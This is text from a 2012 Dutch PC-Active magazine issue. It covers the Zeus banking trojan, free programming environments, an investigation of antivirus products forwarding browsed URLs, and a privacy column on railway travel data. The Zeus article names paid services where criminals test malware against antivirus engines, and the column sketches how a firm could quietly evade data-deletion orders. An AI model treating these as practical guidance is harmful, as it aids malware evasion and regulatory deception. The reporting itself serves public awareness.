Hoe het begon Zeus werd voor het eerst waargenomen in 2007 na een cyberaanval die werd gelanceerd op de computers van het Amerikaanse ministerie van Transport. Sinds die tijd is Zeus succesvol gebleven. Opererend vanuit duizenden botnets is het feitelijk de dominante trojan op het wereldtoneel geworden, die goed is voor meer dan dertien miljoen geïnfecteerde pc’s. De totale financiële schade is niet exact bekend, maar beloopt zeker al in de honderden miljoenen euro’s. Als neveneffect is er bij sommige banken sprake van een aanzienlijke imagoschade. En dat alles wordt mogelijk gemaakt door kwaadaardige software, die simpelweg werkt volgens het principe van keystroke logging en form grabbing: alle alfanumerieke gegevens die een gebruiker op zijn toetsenbord ingeeft,
12
Zeus.indd 12
worden geregistreerd, wat zeker in het geval van bankzaken gevaarlijk is.
Ordinaire criminelen De ontwikkelaars van trojans als Zeus worden wel hackers genoemd. Maar in dit geval gaat het niet om de personen die vanuit liefde voor hun hobby inbreken in allerlei computersystemen en netwerken, zonder er financieel beter van te willen worden. We hebben te maken met ordinaire cybercriminelen. Veel van hen komen uit Rusland. Ze doen er echt alles aan om iets van u te kunnen stelen. De schade van cybercrime in Europa bedraagt nu al tientallen miljoenen euro’s per jaar, waarvan de bijdrage uit Nederland goed is voor ongeveer tien miljoen euro. Veel mensen krijgen nu beelden voor ogen uit Hollywood-thrillers waarin hoogopgeleide computerspecialisten hun werk in een grimmig achterkamertje - maar wel achter hoogwaardige computers - moeten verrichten, terwijl uit de kluiten gewassen bullebakken dreigend toekijken. Maar de werkelijkheid is anders! Zeus werd zonder twijfel op de wereld losgelaten door goed georganiseerde professionals, die onderdeel zijn van daadkrachtige criminele organisaties. Zij plannen met precisie hun criminele financiële doelen, maken een aanvalsplan en kopen uiteindelijk complete software-
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:05 AM
ZEUS
pakketten, ondersteuning en diensten in; ondersteuning in de vorm van gecertificeerde ICT-specialisten die de ontwikkeling van de software naar malware voor de organisatie begeleiden. De aanschaf van zo’ n compleet malwarepakket bedraagt zo’n tienduizend euro. De kosten voor het inkopen van de noodzakelijke diensten en de dienstverlening van de internet service provider (ISP) bedragen ongeveer zevenduizend euro.
Functionaliteit versus antivirus Uiteraard moet de aangekochte software eerst tot goede malware worden bewerkt. Maar de Russische crimineel doet dat niet zelf. De organisatie begeleidt en controleert. Het meeste werk wordt namelijk gewoon uitbesteed of er worden in Rusland of in de regio - veelal Oekraïne of Wit-Rusland - specialisten ingehuurd. Na alle aanpassingen moet een versie van Zeus zijn ontstaan, die voldeed aan de eisen van de criminelen. Zoals gewoonlijk ging hun voorkeur uit naar een Trojaans paard, omdat deze vorm van malware de beste kans van slagen biedt bij het stelen van gegevens. Die worden op hun beurt gebruikt voor financiële fraude. Maar er moest nog meer gebeuren. Nadat de laatste patch aan Zeus was toegevoegd, kwam de langste en moeilijkste weg, namelijk het testen van de nieuwe malware. Dat ingewikkelde proces werd waarschijnlijk eveneens door ingehuurde experts uitgevoerd. Zo moest de nieuwste versie van Zeus natuurlijk goed werken en niet direct door antivirussoftware als malware worden herkend. Het onderzoeken van zo’n eerste versie duurt dan ook gemakkelijk een halfjaar of langer. Duizenden scans, uitgevoerd door speciaal daarvoor ingerichte websites, gaan daar gewoonlijk aan vooraf. U kunt dit proces het beste vergelijken met het certificeren van software, waarbij deze vorm van kwaliteitscontrole maatgevend is voor de werking van de malware. Op de Russische website virtest.com [1] - wel even Google Translate aanzetten - of op scan4you. net [2] kunt u malwarebestanden tegen betaling één jaar lang laten testen. Toen de kwaadaardige software de kwaliteitscontrole goed had doorstaan, brak de belangrijke eindfase aan.
Van eindfase naar operationeel In de eindfase werd de ontwikkelde Zeus-malware in zijn geheel geïntegreerd in de zogeheten Blackhole exploit kit en daarna geïnstalleerd bij een ISP. Het genoemde pakket doet eigenlijk niets anders dan het genereren en exploiteren van een gewone website voorzien van een kwaadaardige code, die uiteindelijk door de cybercriminelen wordt gebruikt om data zoals e-mailadressen of wachtwoorden via de trojan te kunnen achterhalen. Een potentieel slachtoffer laadt de gecompromitteerde webpagina of opent een kwaadaardige link
| ACHTERGROND
Bleeding life In de voormalige Sovjet-republieken is de Blackhole exploit kit razend populair, maar het kan altijd beter! Zoals de naam al aangeeft, belooft Bleeding Life weinig goeds. Deze software kan maximaal zes exploits genereren, is relatief goedkoop en richt zich permanent alleen op problemen in Acrobat-, Flash- en Java-software. De exploit heeft zijn bijzondere naam te danken aan zijn zeer hoge slagingspercentage.
in een e-mail, bijvoorbeeld in een spambericht of een nieuwe trend - een valse Facebook-uitnodiging. Vervolgens probeert Zeus zich via de exploit op het systeem van de bezoeker te installeren. Dan pas kan het Trojaanse paard zijn slag slaan, door misbruik te maken van een aantal softwarekwetsbaarheden zoals fouten in het besturingssysteem of de browser zelf. Maar de meest voorkomende doelwitten zijn de browser plug-ins, bijvoorbeeld die voor Java (Jscript en/of VBscript), Adobe Flash en Adobe PDF. En ook de bekende mediaspelers kunnen het doelwit zijn.
URL-blacklists Tijdens de operationele fase houden de makers van malware als Zeus de firewall- en antivirusproducten goed in de gaten. Een exploit kit is goed zichtbaar, want er zijn honderden kopieën tegelijk actief op het internet. Door het vaak genereren van grote aantallen bezoekers komen ze binnen zeer korte tijd op URL-blacklists, die vervolgens weer firewall- en antivirusproducten aansturen via een update. Dat updateproces gaat redelijk snel. Als reactie hierop wordt er door de cybercriminelen snel gewisseld tussen de domeinen, soms meer dan tientallen keren per dag. Het wisselen van ip-nummers is noodzakelijk voor het voorkomen van problemen als een definitieve blokkade bij de ISP van het slachtoffer.
Zwitserse precisie Vanuit Zwitserland wordt dagelijks gekeken naar ontwikkelingen van Zeus op het web, door middel van een website die de ontwikkelingen nauwgezet volgt. Bekijk eens de real-time Zeus blokkadelijst [3] of als u meer interesse hebt in een statistisch overzicht [4] de Zeus monitor [5], die een overzicht per land geeft. Daaruit blijkt dat die paar echte cybercriminelen uit Nederland het zo slecht nog niet doen [6]! Het is een kat-en-muisspel, want dagelijks kijken de cybercriminelen mee, en het ziet er naar uit dat we het laatste nog niet van Zeus hebben gezien.
INFOLINK 262008
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262008
PC-ACTIVE | Nr. 262 – 2012
Zeus.indd 13
13
9/6/12 10:05 AM
MAAK HET ZELF!
SHAREWARE TEKST : JAN ROZ A
Via internet is voor elke toepassing wel een programma te vinden, maar zijn die wel precies naar uw smaak en behoefte? Waarom zou u het ideale programma niet zelf maken?
INFOLINK: SOFTWARE
V
aak vindt u op internet een programma dat aan al uw behoeften lijkt te voldoen, maar merkt u in de praktijk dat het toch net niet is wat u zoekt. Soms zal gewoon de manier van werken niet helemaal uw manier zijn en soms mist u gewoon functionaliteit. Ook na lang zoeken en proberen hebt u nog steeds niet het ideale programma gevonden… dus wat nu? Waarom zou u het door u gewenste programma niet zelf maken? Programmeren gaat niet vanzelf; daar zult u zich wel wat voor moeten inlezen, maar voor talen als Pascal en Java zijn voorbeelden en lesmateriaal volop aanwezig op het internet. Natuurlijk moet u daarvoor ook goede ontwikkelsoftware hebben, maar ook die is op het wereldwijde web te vinden en is in een aantal gevallen zelfs gratis. Dus wat houdt u tegen? De shareware in deze aflevering helpt u op weg.
Lazarus 1.1
14
Shareware.indd 14
Lazarus In het verleden werd de taal Pascal veel gebruikt voor het opleiden van programmeurs. De taal was hier uitermate geschikt voor, omdat de opzet van Pascal de gebruiker automatisch dwong om gestructureerd te programmeren. TurboPascal was de bekendste Pascal-variant die werkte onder DOS. Met de opkomst van Windows verdween de taal langzaam maar zeker en nam Delphi de plaats van TurboPascal in. De programmeertaal Pascal was gebleven, maar verder is Delphi een volledig op Windows gerichte ontwikkelomgeving. De eerste jaren was er voor de thuisgebruiker nog een gratis Delphi-versie, maar de laatste jaren niet meer, waardoor de taal voor de thuisgebruiker minder interessant is geworden. Gelukkig is een aantal enthousiastelingen het Lazarus Project begonnen, waarbij ze een zeer veel op Delphi lijkende ontwikkelomgeving bouwden die was gebaseerd op de Free Pascal compiler. De syntax van de programmeertaal Free Pascal lijkt heel veel op die van TurboPascal en Delphi, waardoor software ontwikkelen met Lazarus net zo prettig gaat als met Delphi. Lazarus kan net als Delphi worden uitgebreid met door derden ontwikkelde componenten, maar in beide gevallen zijn ze niet direct uitwisselbaar. Er zijn componenten voor elk denkbaar onderwerp, bijvoorbeeld voor het ontwerpen en afdrukken van rapporten, verschillende formaten databases, encryptie, aanmaken van pdf-bestanden, extra schermelementen en het exporteren van data. Voor het opsporen van fouten kunt u breekpunten zetten om uw project tijdelijk te stoppen en de inhoud van variabelen te bekijken. En het mooiste en sterkste punt van Lazarus: u kunt er programma’s mee maken die geschikt zijn voor
PC-ACTIVE | Nr. 262 – 2012
9/6/12 10:07 AM
SHAREWARE
| SOFTWARE
Windows, Linux, Mac OS, WindowsCE en deels ook voor Android.
Lazarus 1.1 Auteur: Toepassing: Systeem: Registratie:
The Lazarus Project Softwareontwikkeling Windows XP/Vista/7 Gratis
XPower++ XPower++ is de beste reclame die Lazarus zich maar kan wensen, want deze ontwikkelomgeving is er geheel mee gebouwd. Ook hier treft u weer een zeer complete programmeeromgeving aan voorzien van een schermontwerper en een source code editor. Ook in deze omgeving kunt u breekpunten plaatsen en stap voor stap door de broncode heen stappen tijdens het uitvoeren van de code. Wat XPower++ bijzonder maakt, is dat u kunt kiezen uit maar liefst vier verschillende talen waarin uw project kan worden geprogrammeerd: Basic++, C++, Java++ en Pascal++. Hebt u dus al wat ervaring in één van deze talen, dan is de instap in XPower++ een stukje makkelijker geworden. Overigens vergt programmeren toch nog wel wat oefening, want als u gaat coderen zult u merken dat het bij alle vier de gevallen gaat om dialecten van deze talen met toch nog wel wat verschillen op detailniveau. Een ander aantrekkelijk punt van XPower++ is dat u behalve standaardprogramma’s die lokaal dienen te worden geïnstalleerd, uw programma ook als Grid++ applicatie kunt opslaan op een weblocatie. Hiervoor dient u dan wel een separaat Grid++ abonnement af te sluiten. Voordeel is dat wie uw programma willen gebruiken, enkel een internetverbinding nodig hebben om het te kunnen draaien. Overigens kunt u met de gratis versie alleen apps maken en geen gecompileerde, zelfstandig draaiende programma’s.
XPower++ 2.03 Auteur: Toepassing: Systeem: Registratie:
++Technologies Softwareontwikkeling Windows XP/Vista/7 Gratis (Live Developer edition)/$ 229,(Starter edition)
NetBeans Voor het programmeren in Java is Eclipse de bekendste ontwikkelomgeving, maar NetBeans doet daar zeker niet voor onder. Ook hier ziet u weer een soortgelijke omgeving als bij Lazarus en XPower++, maar dan specifiek gericht op Java. Hoewel toch in hoofdzaak bedoeld voor de programmeertaal Java kunt u NetBeans ook uitbreiden met ondersteuning voor de
NetBeans 7.2
talen PHP, C en C++. Verder kunt u deze programmeeromgeving uitbreiden met allerlei plug-ins die u meer functionaliteit bieden bij het bouwen van uw programma’s. Deze extra opties kunnen uitbreidingen voor de NetBeans-ontwikkelomgeving zelf zijn, maar kunnen deze bijvoorbeeld ook voorzien van toegang tot andere typen databases, extra elementen voor schermontwerpen of reports. Er is een NetBeans-versie die draait onder Windows, maar ook één voor Linux, Solaris en Mac OS X. De programma’s die u maakt met NetBeans draaien uiteraard op elk platform dat ook Java ondersteunt. Op de NetBeans-website zijn uitgebreide tutorials en documenten te vinden over alle aspecten van software ontwikkelen met NetBeans.
NetBeans 7.2 Auteur: Toepassing: Systeem: Registratie:
Oracle Corporation Softwareontwikkeling Windows XP/Vista/7 Gratis
Conclusie Onze favoriet is toch wel Lazarus vanwege de makkelijke instap in Pascal als programmeertaal en de hoeveelheid uitbreidingen die al voor dit programma verkrijgbaar zijn. NetBeans is een goede tweede, maar om Java goed toe te kunnen passen zult u wel wat voorstudie moeten doen. XPower++ ziet er veelbelovend uit. Jammer is wel dat de versie waarmee u echte programma’s kunt maken, zo’n stevig prijskaartje heeft.
INFOLINK 262006
Voor de downloads bij dit artikel: http://www.pc-active.nl/262006
PC-ACTIVE | Nr. 262 – 2012
Shareware.indd 15
15
9/6/12 10:07 AM
HET GEVAAR VAN GEHEIME URL’S
UW PRIVÉFOTO’S ONLINE
GELEKT? TEKST : KOEN VERVLOESEM
Veel virusscanners hebben een functie waarbij elke door u bezochte URL wordt doorgestuurd naar een server en deze dan op malware wordt gecontroleerd. Hierdoor kan snel worden gereageerd op dreigingen. Maar hoe zit het eigenlijk met uw privacy?
H
eel wat virusscanners maken tegenwoordig gebruik van ‘cloud-gebaseerde bescherming’. Dit is een hip woord voor iets heel eenvoudigs. Elke keer dat u in uw webbrowser een URL bezoekt, wordt die naar een server van de antivirusproducent gestuurd, en vervolgens wordt gecontroleerd of die op een ‘zwarte lijst’ met URL’s staat, oftewel linkjes waarvan bekend is dat ze gevaarlijk zijn. De URL krijgt dan groen of rood licht en in het eerste geval laadt uw webbrowser het linkje eenvoudigweg in, terwijl u in het tweede geval een waarschuwing van de antivirusproducent krijgt te zien. Het voordeel van zo’n cloud-gebaseerde bescherming is dat u niet zelf lokaal een hele databank
16
met gevaarlijke URL’s hoeft te hebben, die u regelmatig moet updaten; de controle gebeurt op een server in de cloud. Maar hoe stelt de antivirusproducent zo’n zwarte lijst op? Dat kan bijvoorbeeld door alle door gebruikers doorgestuurde URL’s te analyseren op het voorkomen van bekende malware. Een andere methode: de producent bezoekt die URL’s in een webbrowser in een virtuele machine, en wanneer er malware wordt gevonden, wordt die URL dan als gevaarlijk gemarkeerd. Vanaf het moment dat één gebruiker de betreffende link bezoekt en de server de malware ontdekt, zijn alle andere gebruikers beschermd. Wanneer zij dezelfde URL bezoeken, krijgen ze onmiddellijk een waarschuwing te zien.
PC-ACTIVE | Nr. 262 – 2012
Antivirus geeft url's door.indd 16
9/6/12 4:51 PM
Geheime url’s
| Achtergrond
Gelekte URL’s
Hoe ontdekt u dit?
Dit klinkt allemaal mooi en heel handig, maar deze opzet heeft één bijkomstigheid waarvan veel privacy minnende gebruikers zullen huiveren: u deelt alle door u bezochte URL’s met een buitenstaander. Nu denkt u misschien dat u toch anoniem bent en dat de server toch alleen maar geautomatiseerd uw URL’s analyseert en er geen persoon aan te pas komt, maar hebt u echt de garantie dat een werknemer van de antivirusproducent niet met een ongezonde belangstelling door de toegestuurde linkjes bladert? Wat als u een portal van uw bedrijf bezoekt die niet zo goed is beveiligd, omdat de beheerder dit niet nodig vindt, aangezien u en uw collega toch de enige zijn die de URL kennen? Of uw ERP-systeem of SharePointcontentmanagementsysteem? Of - nu we toch onze paranoïde hoed op hebben - wat als u een ‘geheime URL’ van een online dienst bezoekt die uw vrouw u heeft gestuurd, waarop een foto van haar in haar nieuwste lingerie is te zien? De bedoeling van zo’n geheime link is dat enkel de zender en ontvanger die kennen. Maar die veronderstelling klopt niet meer als die URL door de plug-in van uw webbrowser naar een server wordt gestuurd, waar de server de foto gretig ter analyse downloadt. Wie weet heeft een systeembeheerder van de antivirusdienst zelfs een scriptje geïnstalleerd om hem automatisch foto’s door te sturen die door het systeem worden verwerkt... Die obscure URL is bij heel wat online opslagdiensten, waaronder Dropbox, de enige beveiligingsmaatregel voor een gedeeld bestand. Meer in het algemeen bevatten de URL’s van tal van pagina’s informatie die vertrouwelijk is of aan u als persoon kan worden gekoppeld. Het gaat dan om HTTP GETparameters, met URL’s in de volgende vorm: http://www.example.com/profile?userid=12345 http://www.example.com/ login?user=koen&password=geheim http://www.example/com/mail?msgid=738ddf35b 3a85a7a6ba7b232bd3d5f1e4d284ad1
Wilt u controleren of uw virusscanner ook al uw bezochte URL’s bekijkt, dan kunt u dat op verschillende manieren doen. De ene methode is met een packetsniffer zoals Wireshark te bekijken of de door u bezochte URL’s naar een bepaalde server worden gestuurd. Maar dit werkt niet wanneer de antivirusproducent de URL’s versleuteld doorstuurt, wat eigenlijk wel zou moeten. De andere manier werkt echter altijd: bezoek de URL van een pagina op een webserver die u zelf beheert en kijk in het logbestand van de webserver of u iets vreemds ontdekt. Dat werkt natuurlijk des te betrouwbaarder als u een link bezoekt die niemand anders kent. Als u in het logbestand een bezoekje van uw eigen ip-adres ziet en vlak erna een bezoekje van een onbekend adres, weet u dat de URL door uw webbrowser of router met cloud-antivirusfunctionaliteit is doorgegeven. Op die laatste manier werd het fenomeen enkele jaren geleden ontdekt [1]. Een bedrijf was een webapplicatie aan het testen met gebruik van een interne webproxy. Het logbestand van de webapplicatie bevatte uiteraard het ip-adres van de webproxy, maar wat opviel is dat exact dezelfde HTTP-aanvragen enkele minuten daarna werden verzonden vanaf een ander ip-adres. Na een onderzoek bleek het om de ip-adressen van Trend Micro te gaan, en na navraag bleek op de webproxy inderdaad de virusscanner van deze fabrikant te draaien... Zonder dat de systeembeheerder dit wist, werd elke URL die door de proxy ging, naar de Amerikaanse servers van Trend Micro gestuurd. Ook het Belgische beveiligingsbedrijf Zion Security ontdekte dit gedrag, dat overigens al minstens vanaf 2009 [2] lijkt plaats te vinden [3]. De directeur van het bedrijf, Erwin Geirnaert, riep antivirusfabrikanten op om hierover meer openheid te scheppen, zodat gebruikers weten waar ze aan toe zijn. Staat er in de gebruikersovereenkomst bijvoorbeeld iets vermeld over het uploaden van uw gegevens? En wordt daarin
U kiest zelf of u van SPN gebruik wilt maken
PC-ACTIVE | Nr. 262 – 2012
Antivirus geeft url's door.indd 17
17
9/6/12 4:51 PM
Achtergrond
| Geheime url’s
Trend Micro bezoekt onze geheime URL’s
gezegd dat dit alleen kan als deze gegevens u niet identificeren? In dat geval begeeft de antivirusproducent zich met het doorgeven van bepaalde privé-URL’s op glad ijs.
het logbestand van onze webserver verschijnen. Dit gebeurde ook als we webpagina’s bezochten met HTTP GET-parameters zoals userid=foo.
Test
Het probleem dat we op deze manier privacygevoelige informatie kunnen lekken, bestaat dus daadwerkelijk. Volgens Barry van Vliet, marketing manager bij Trend Micro, staat in elk geval de privacy van de gebruiker centraal in de werking van de SPN-technologie. Cookies worden bijvoorbeeld niet meegestuurd met de bezochte URL’s, en nadat in het datacenter wordt gecontroleerd of de link gevaarlijk is, wordt de inhoud van de pagina verwijderd. Uw pikante foto’s worden dus niet ergens voorgoed opgeslagen. Bovendien krijgen enkel de threat-analisten van Trend Micro toegang tot de gecontroleerde omgeving met URL’s, en zijn er procedures en managementsystemen ingericht om misbruik te voorkomen. Rest nog de vraag waarnaar de door u bezochte URL’s worden gestuurd. Volgens Van Vliet worden linkjes van Europese SPN-gebruikers naar een Europees datacenter gestuurd. Maar toen we de ip-adressen in de logbestanden van onze webserver natrokken, met behulp van MaxMind, bleken twee ervan uit de Verenigde Staten te komen (150.70.75.30 en 150.70.64.196) en drie uit Japan (150.70.172.208, 150.70.172.203 en 150.70.172.109). Ondanks herhaaldelijke mails en telefoontjes hebben we hier geen reactie van Van Vliet op kunnen krijgen. We komen hier uiteraard op terug. In artikel K van het privacy statement van Trend Micro staat wel dat er data transfers naar buiten de Europese Unie kunnen plaatsvinden, maar dat er dan voor adequate beveiliging wordt gezorgd. Wie de laksere privacywetgeving in de VS niet voldoende vindt, moet SPN dus niet gebruiken.
Om de beweringen van Geirnaert te controleren, downloadden we Trend Micro’s Titanium Maxi Security. We installeerden deze versie met een sleutel, die we voor onze test van Trend Micro Nederland hadden gekregen. De oplossing gebruikt de Smart Protection Network- of SPN-technologie, die men bij Zion Security in actie heeft gezien. SPN is actief in de applicatielaag; er wordt een browserextensie geïnstalleerd, zowel voor Internet Explorer als voor Chrome en Firefox, die alle door u bezochte URL’s in de browser controleert. Dit is overigens complexer dan alleen maar kijken of de link op een zwarte lijst staat; als een aantal gevaarlijke URL’s op hetzelfde domein staat, wordt ook dit hele domein als verdacht aangeduid. Bij de installatie van Titanium Maxi Security krijgt u de vraag: Informatie over bedreigingen delen met Trend Micro? Vinkt u dit aan, dan wordt gebruikgemaakt van SPN. Dit kunt u later op elk moment uitschakelen, in Overige instellingen - Smart Protection Network. Hier staat bij vermeld dat gegevens over bedreigingen worden geanalyseerd zonder dat er persoonlijke gegevens worden verzameld. We maakten enkele bestanden op onze webserver aan met willekeurige bestandsnamen, die niemand anders ‘per ongeluk’ zou kunnen bezoeken. We bezochten deze pagina’s in Internet Explorer en Chrome - de extensies van Trend Micro waren niet compatibel met onze versie van Firefox - en zagen systematisch een tijdje nadien - soms na twee minuten, soms pas na een halfuur - een ip-adres van Trend Micro in
18
Weerwoord
PC-ACTIVE | Nr. 262 – 2012
Antivirus geeft url's door.indd 18
9/6/12 4:52 PM
GEHEIME URL’S
| ACHTERGROND
Onvoorziene problemen Ondanks de voorzorgsmaatregelen kan de aanpak van Trend Micro en andere antivirusproducenten wel eens voor onvoorziene problemen zorgen. In sommige cloud sharing diensten zoals Nomadesk kunt u - bijvoorbeeld als extra beveiligingsmaatregel - instellen dat een bestand op een bepaalde geheime URL slechts een beperkt aantal keren kan worden gedownload. Als dan elke keer dat u zo’n bestand downloadt, dit een tweede keer wordt opgevraagd door een server van uw antivirusproducent, dan kan de file wel eens eerder niet meer beschikbaar zijn dan voorzien. Maar het fundamentele probleem ligt niet bij diensten zoals die van Trend Micro, maar bij de zogenaamde geheime URL’s. Een website die voor privacygevoelige informatie slechts afhankelijk is van het geheimhouden van een URL, is niet veilig; dit is namelijk een vorm van security by obscurity, wat algemeen wordt gezien als onvoldoende. Beter is het om zo’n webpagina enkel toegankelijk te maken na het ingeven van een gebruikersnaam en wachtwoord, waarna een sessiecookie wordt ingesteld die tijdelijk toegang geeft. Bovendien moet dit niet gebeuren via HTTP GETparameters, die in de URL te zien zijn, maar via HTTP POST, waarbij dit niet het geval is. Tot slot zou zo’n pagina alleen via HTTPS beschikbaar mogen zijn, omdat de inhoud anders kan worden onderschept tussen de webbrowser en de pagina. Een alternatieve oplossing is dat de antivirusplug-in in uw webbrowser of router niet de URL’s zelf doorstuurt naar de server, maar een hash ervan. In plaats van http://www.google.com stuurt u dan bijvoorbeeld 738ddf35b3a85a7a6ba7b232bd3d5f1e4d284ad1 door, de SHA-1-hash (Secure Hash Algorithm) van de URL van Google. De toegestuurde hash van een URL kan dan nog altijd heel eenvoudig worden opgezocht in de ‘zwarte lijst’ met hashes van linkjes waarvan bekend is dat ze gevaarlijk zijn. Die blacklist kan dan echter niet meer worden samengesteld aan de hand van URL’s die door gebruikers worden doorgestuurd, maar door actief het web te crawlen op zoek naar gevaarlijke exemplaren. Het verschil met deze oplossing is ook: in principe ziet de server van de antivirusproducent nu niet meer welke URL’s u bezoekt, behalve wanneer u naar eentje gaat die op de zwarte lijst staat, terwijl de functionaliteit - namelijk bepalen of een link gevaarlijk is - exact hetzelfde blijft. Als u dus een privé-URL bezoekt, hoeft u niet bang te zijn dat deze wordt bekeken door een werknemer van uw antivirusproducent, want u stuurt enkel de hash door en daarvan kan niet worden berekend welke URL daarbij hoort. Een kleine nuancering is hier wel op zijn plaats: het is niet zo moeilijk voor een werknemer van de antivirusproducent om te controleren of u Google, Bing, LinkedIn of een andere populaire website bezoekt. Hij kan immers eenvoudig een lijst met de honderden of zelfs duizenden populairste URL’s hashen en deze
dan vergelijken met de hashes van URL’s die u bezoekt. Alleen is dit in het algemeen nu niet zo’n groot privacylek... Een andere oplossing is om een lokale database te hebben van hashes van URL’s waarvan bekend is dat ze gevaarlijk zijn. Dat is de manier waarop Google Safe Browsing [4] werkt - zie Het Lab in PC-Active # 260 van juli/augustus - wat de technologie is achter de Phishing and Malware Protection van Chrome en Firefox. De webbrowser downloadt dan periodiek een
Het gaat om een afweging tussen privacy en veiligheid nieuwe lijst met hashes, waarin ze bij elke URL die u bezoekt, controleert of er iets verdachts aan is. Op deze manier krijgt geen enkele server te zien welke URL’s u bezoekt. Het nadeel van deze alternatieven is dat ze niet zo kort op de bal kunnen spelen én dat ze door te crawlen niet zo snel zoveel URL’s kunnen controleren.
Besluit Bij beveiliging gaat het altijd om een afweging, in dit geval één tussen uw privacy en uw veiligheid. Als iedereen alle URL’s die hij bezoekt, doorgeeft aan de antivirusproducent, wordt een gevaarlijk linkje zo snel mogelijk opgemerkt en worden andere gebruikers zo voor het gevaar behoed. Maar dan moet u er wel mee kunnen leven dat u potentieel privacygevoelige URL’s aan de softwareleverancier lekt. Iets wat overigens niet de fout is van de fabrikant, maar van de makers van websites die gebruikmaken van geheime URL’s en zich zo bezondigen aan security by obscurity. Een minder drastische oplossing is die van Google Safe Browsing, die periodiek een lijst van hashes van gevaarlijke URL’s downloadt, zodat uw webbrowser deze lokaal controleert. Maar met deze aanpak is het wel moeilijker om een heel veilige antivirusoplossing te bouwen, omdat de lokale databank nooit volledig tot op de laatste seconde up-to-date is en de antivirusproducent zo zelf op zoek moet gaan naar gevaarlijke URL’s. Kortom, u moet zelf de keuze maken waar u wilt surfen binnen het hele spectrum tussen absolute privacy en absolute veiligheid.
INFOLINK 262005
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262005
PC-ACTIVE | Nr. 262 – 2012
Antivirus geeft url's door.indd 19
19
9/6/12 4:52 PM
SOFTWARE
| XXXX
PRIVACY TEKST : HENK VAN DE K AMER
HET CBP, EEN PAPIEREN TIJGER? Bij het invoeren van de ov-chipkaart was - en is - het de natte droom van een aantal directies: exact weten wie wanneer waarheen reist. Deze neurotische verzamelwoede breidde zich al snel uit naar student- en jaarkaarthouders. Vroeger was het tonen van een kaart afdoende, maar tegenwoordig moeten ook deze reizigers verplicht in- en uitloggen. Dat laatste woord gebruik ik trouwens bewust. Studenten spanden hiertegen een rechtszaak aan en wonnen. Om vervolgens begin dit jaar te ontdekken dat zij alsnog het haasje zijn. Ons College Bescherming Persoonsgegevens, het CBP, deed onderzoek naar de bewaartermijnen. In eerste instantie dachten de NS en andere vervoersbedrijven slim te zijn door te wijzen op de belastingwetgeving, maar daar werd gehakt van gemaakt. Vervolgens beweerden de spoorwegen dat de gegevens geanonimiseerd waren, maar dat blijkt in de praktijk niet zo makkelijk te zijn. Inderdaad kon het CBP de anonieme transacties nog steeds herleiden naar een persoon. Medio vorig jaar was er dan eindelijk overeenstemming over de maximale bewaartermijn en droeg het CBP via een dwangsom [1] op dat deze eind 2011 ingevoerd moest zijn. Uiteraard gebeurde dat niet en moet de NS nu een boete betalen [2]. Die boete klinkt leuk, maar wie gaat die betalen? Levert de directie haar bonus in vanwege deze wanprestatie? Natuurlijk niet; een paar weken geleden kondigde de NS weer een prijsverhoging aan onder het mom van inflatiecorrectie [3], maar wij weten wel beter. U en ik betalen uiteindelijk die boete. Punt. En denkt u dat de NS van de boete gaat leren? Natuurlijk niet; het bedrijf heeft al bezwaar aangetekend, omdat het meent dat de gebruikte methode wel degelijk anonieme gegevens oplevert. Maar stel dat het CBP na een jarenlange strijd het van de NS wint, zijn onze reisgegevens dan eindelijk veilig? Wie ‘ja’ denkt, heeft blijkbaar een grenzeloos vertrouwen in dit soort bedrijven. Zoals gezegd is het een natte droom en zoiets pak je niet even af. Laat ik mijzelf eens in de schoenen van de NS plaatsen. Oké, ik moet gegevens anonimiseren en uiteindelijk vernietigen. Hoeveel kennis en tijd zal het CBP daarin kunnen steken? Het college heeft al vaker aangegeven niet de mankracht te hebben om alles te
20
privacy.indd 20
kunnen controleren [5]. Hun onderzoek kan dus nooit alle servers, e-mail of werkwijzen bij de NS nalopen. Maar laat ik als denkbeeldig directielid mijn sporen zoveel mogelijk verwijderen. Als eerste geef ik systeembeheer opdracht dat vanaf nu de back-ups twee jaar lang bewaard moeten worden. Rek ik toch mooi die afgesproken termijn van twee jaar op naar het dubbele. Omdat tapes die twee jaar in een kast liggen, niet echt betrouwbaar meer zijn, geef ik systeembeheer vervolgens een budget om na twee jaar de tapes te laten vernietigen en vervangen door nieuwe. Tot slot richt ik een datavernietigingsbedrijfje op en zorg ik ervoor dat dit de opdracht krijgt. In plaats van vernietigen gaan de data daar natuurlijk het eeuwige leven leiden. Dit is één scenario en als ik echt creatief word, kan ik er nog wel een stuk of tien bedenken die allemaal geen verdachte sporen achterlaten. Waarna een controle door het CBP met een gerust hart kan worden afgewacht. Het vervelende van digitale gegevens is dat vernietigen zo goed als onmogelijk is. Of misschien beter gezegd: dat een exacte kopie erg snel gemaakt kan worden. Voor wie echt kwaad wil, is het vernietigingsproces dan ook te omzeilen zonder dat daar een haan naar kraait. De geschiedenis leert dat de mens zeer creatief regels weet te omzeilen zodra het (commerciële) belang maar groot genoeg is. Stel dat de NS met uw gepersonaliseerde in- en uitloggegevens een cent per transactie kan verdienen. Dat lijkt weinig, maar in 2007 [6] maakten dagelijks reeds 1,1 miljoen reizigers gebruik van de trein. De meesten zullen een heen- en terugreis maken, wat dan neerkomt op zo’n twee miljoen transacties per dag. Onze bescheiden cent komt dan neer op dagelijks twintigduizend euro en daarvoor kan zelfs ik heel creatief worden. Niet voor niets hebben we het spreekwoord dat vele kleintjes één grote maken.
INFOLINK 262017
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262017
PC-ACTIVE | Nr. 262 – 2012
9/6/12 4:18 PM
WORD ABONNEE Mis geen nummer meer van PC-Active, het meest spraakmakende computermagazine! FAKEBOOK: OPLICHTER PC-ACTIVE | OKTOBER 2012
S ONTMASKEREN OP
SOCIAL MEDIA
16
ANTIVIRUS IN DE CLOUD AL UW
INTERNETVERKEER BESPIONEERD?
262
42
JAARGANG 24 | 2012
WORKSHOP GEODATA uw eigen data op de kaa rt
MECHANISCH KEYBOARD 68
(inclusief oefendossier)
Perfectie onder uw ving ers
34
WEBSUCCES METEN
83
DOE ‘T ZELF SHAREWARE
14
Google Analytics of logfi les Makkelijk zelf program
22
VRIJE SCHIJFRUIMTE IN EEN OOGOPSLAG Gratis HD analyse
meren
tools
KNMI SUPERCOMPUTER 76
ROLLS ROYCE TABLET Wacom Intuos5 touch +
64 actie
MICROSOFT FLIGHT
30
Gratis (?) vliegsimulator
CHIPSET HISTORIE
De processor neemt het
54 over
BITCOINS BEVEILIGEN 50
Tips, trucs & tools
TROJAN ZEUS
12
CHIP IN UW BREIN
